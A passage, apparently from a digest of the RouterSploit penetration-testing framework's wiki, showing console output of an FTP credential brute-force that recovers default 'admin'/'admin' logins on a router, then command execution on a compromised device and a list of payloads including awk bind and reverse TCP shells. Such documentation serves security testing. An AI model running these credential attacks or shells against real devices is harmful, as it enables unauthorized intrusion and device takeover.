Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` -------------------------------- ### Execute Commands and Show Payloads Source: https://github.com/threat9/routersploit/wiki/Exploiting-Target After gaining initial access, use this to execute commands on the target and view available payloads for further exploitation. Ensure you have a command loop active. ```text [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > uname -a [*] Executing 'uname -a' on the device... Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i386 GNU/Linux cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk. awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk. awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk. ```